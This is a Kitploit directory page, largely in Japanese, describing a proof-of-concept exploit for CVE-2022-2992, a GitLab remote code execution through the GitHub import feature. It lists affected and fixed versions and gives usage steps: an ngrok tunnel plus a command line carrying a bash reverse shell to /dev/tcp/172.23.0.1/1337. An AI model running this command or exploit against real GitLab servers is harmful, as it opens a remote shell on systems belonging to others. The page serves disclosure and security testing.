Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVEs — A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs. | Kitploit
ツール/GitHubGitHub/redwaysecurity/cves
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubredwaysecurity/cves

CVEs

A collection of proof-of-concept exploit scripts written by the team at Redway Security for various CVEs.

リポジトリを見る
22301年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-2992: Github インポートを介したリモートコマンド実行

情報

説明: これにより、認証済みユーザーは Import from GitHub API エンドポイントを介してリモートコード実行を達成できます。
影響を受けるバージョン: 11.10 から 15.1.6 より前の全バージョン、15.2 から 15.2.4、15.3 から 15.3.2
修正済みバージョン: 15.3.2
研究者: vakzz
解説リンク: https://blog.redwaysecurity.com/2023/04/desenvolvendo-o-exploit-para-o-cve-2022.html
NIST CVE リンク: https://nvd.nist.gov/vuln/detail/CVE-2022-2992

概念実証エクスプロイト

説明

認証済みユーザーは、Github から Gitlab へリポジトリをインポートできます。攻撃者が制御するサーバーからインポートを試みることが可能で、このサーバーはネストされた default_branch 内で Redis のシリアライゼーションプロトコルオブジェクトを返します。これにより、Gitlab はこのオブジェクトを Redis 上にキャッシュし、Redis はそれをデシリアライズしてペイロードの実行をトリガーします。

使用方法/エクスプロイト

個人アクセストークン が必要です。

root@kitploit:~
$ bundle install # install dependencies $ ngrok http 127.0.0.1:4567 # start ngrok tunnel $ export NGROK_URL=https://68b9-83-173-213-121.eu.ngrok.io # use the url from ngrok $ ruby exploit.rb http://target.gitlab.com w4dg6wVj7j7xlJgpGLEYdwFe 'bash -c "sh -i >& /dev/tcp/172.23.0.1/1337 0>&1"' # that is a example, use your own payload

例

Github インポートを介したリモートコマンド実行

ツールをダウンロード